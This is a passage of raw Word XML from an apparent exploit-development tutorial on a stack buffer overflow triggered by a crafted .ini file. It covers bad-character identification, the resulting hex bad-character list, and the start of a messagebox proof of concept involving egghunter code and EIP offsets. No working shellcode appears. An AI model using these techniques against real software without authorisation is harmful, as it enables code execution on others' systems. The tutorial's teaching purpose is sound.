      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F905758" w14:textId="584285D4" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Now that an address for EIP has been Identified, and it has been confirmed that there is space for a script, it is possible to run shellcode that is uploaded. Before generating a payload, it is important to know if there are any filters changing or removing characters. This can be done using the file generated by Crashtest.pl in Appendix A - Crashtest.pl. This generates a file that, once every ascii character is pushed onto the top of the stack, can be examined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73D3DC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9747" w:type="dxa"/>
        <w:tblInd w:w="-108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="731"/>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="7513"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="464F0422" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="799399BA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302DD22B" wp14:editId="68E48CB1">
                  <wp:extent cx="426600" cy="3029040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20"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426600" cy="3029040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E7D699C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>!#$ %&amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C495506" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>'()*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444F885E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+,.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A2F590A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>/012</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457794C5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>3456</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179335FE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>789:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058AFE62" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>;&lt;=&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404DB66A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>?@</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="005BDEEC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>BCDE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F83B21D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>FGHI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A54ED15" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>JKLM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07183219" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>NOPQ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46469909" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>RSTU</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D69D1B4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>VWXY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9E9B49" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Z[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>\]^</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B848DE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>_`ab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D01E2C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Cdef</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="352280AA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Ghij</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="07AEBBEC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Klmn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="556C0F1F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Opqr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2D8CEF8E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Stuv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="12CEE584" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Wxyz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2647C502" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="code"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>{|}~</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A5D9F37" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">By comparing the two lists shown in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71475630 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 15 - Character Filtration Comparison</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> it is possible to see some inconsistencies. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>A number of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> characters have been removed from this selection. These consist of:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B1D160" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BA4C42" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A0C4788" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54211827" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A871A7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1CD336" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>In addition to this, the ~ appears to have been converted to “.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75DF734A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Generally speaking, it</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is better to be safe than sorry when it comes to character filtration. It is far more likely that there will be issues with bad chars missing from the list than there being too many. So, if there is any question of a character being manipulated by the program, it can then be added to the list.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1856D253" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55CF781E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>These values can be represented in hex as; \x24 \x25 \x2c \x3d \x5c \x7e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="133FF90F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="184265FB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>This is the list of application-specific bad characters that will be omitted from any exploits created for this application. Knowing this in hex is useful as applications generally, but not exclusively, use the hex values to identify characters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="605E5DCC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Ref71475630"/>
      <w:bookmarkStart w:id="42" w:name="_Toc71564051"/>
      <w:r>
        <w:t>Figure 15 - Character Filtration Comparison</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="1F4145F6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:eastAsia="F" w:cs="F"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2625A298" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc71564007"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proof of Concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="0CDB6BDA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>The second stage of exploiting the application is to prove that shellcode can be run using the application. This will be done by utilizing the information gathered and submitting an .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file that calls a simple command. For the purposes of this tutorial a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>messagebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be generated. However, any simple command could be used to prove the potential of this exploit.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9300" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="0BFFA732" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="24" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58C53A5F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Unexpected Issues</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215D46D9" w14:textId="57E16279" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">When performing the next </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>stages</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> it’s always possible that something may happen to cause the shellcode to not execute. For example, in this example, when running the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>egghunter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> code the distance to EIP had changed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1273C1BC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F650AC" wp14:editId="5E819F50">
                  <wp:extent cx="5943600" cy="665640"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1110"/>
                  <wp:docPr id="21"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943600" cy="665640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DDC0709" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D06D7E1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>If an unexpected error occurs or the stack does not react as expected, then be sure to go back through the preparation stage and verify that none of the variables have been changed. Then, adjust the exploit to compensate.</w:t>
